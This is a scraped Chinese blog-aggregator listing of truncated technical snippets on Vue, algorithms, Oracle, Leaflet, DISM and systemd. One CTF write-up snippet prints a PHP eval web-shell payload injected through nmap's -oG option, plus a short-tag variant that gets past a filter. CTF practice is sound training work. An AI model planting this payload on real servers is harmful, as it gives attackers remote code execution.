vue-canvas-effect canvas动画合集Vue组件 <p align="center"> [? online demo](https://chenxuan0000.github.io/vue-canvas-effect/index.html) </p> 内容 浏览器兼容 安装 使用 ...
分类:
其他好文 时间:
2020-06-07 13:10:30
阅读次数:
129
https://loj.ac/problem/2823 http://www.boi2014.lmio.lt/tasks/friends-en.pdf http://www.lydsy.com/JudgeOnline/problem.php?id=3916 考虑分类讨论添加的字母出现的位置。 具体的 ...
分类:
其他好文 时间:
2020-06-06 18:55:26
阅读次数:
62
重建索引 alter index pk_kc03 rebuild 批量查询无效索引 select 'alter index '||index_name||' rebuild online;' from user_indexes where status <> 'VALID' and index_na ...
分类:
数据库 时间:
2020-06-03 17:15:41
阅读次数:
79
题目链接 题解 很裸的网络流,加入源点和汇点对二分图求最大匹配,跑最大流就行了 记录方案只需要看对应边的剩余容量是否为0。 查看代码 #include <bits/stdc++.h> using namespace std; typedef long long ll; const int maxn ...
分类:
其他好文 时间:
2020-06-02 19:08:03
阅读次数:
50
let map = L.map("mapid", { minZoom: 10, maxZoom: 15, center: [37.005646, 114.52044], zoom: 11, zoomDelta: 0.5, fullscreenControl: false, zoomControl: ...
分类:
其他好文 时间:
2020-06-02 00:10:25
阅读次数:
459
和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o ...
分类:
其他好文 时间:
2020-05-29 19:49:08
阅读次数:
352
从Win10包中找到sxs的目录,并将目录的所有内容复制到本地计算机中的c:\中。 控制台窗口中执行命令: Dism /online /enable-feature /featurename:Netfx3 /source:c:\sxs 参考资料: https://itnews.jp/?p=13353 ...
[Unit]Description=#{projectName} is used for collecting host metricsAfter=network.target network-online.targetWants=network-online.target [Service]Typ ...
分类:
编程语言 时间:
2020-05-28 14:58:19
阅读次数:
86
详情点击:https://blog.csdn.net/h610443955/article/details/84818400 解决方法:在系统恢复命令——Dism命令,中输入下面红色代码。核心模式core 变回完整模式 Full,用dism命令,具体命令如下:dism /online /enable ...
ClientTools tools = new ClientTools(); ClientContext clientContext= tools.GetContext(OnlineSiteUrl, User, Pass, true); //false 本地 true ONline Web web ...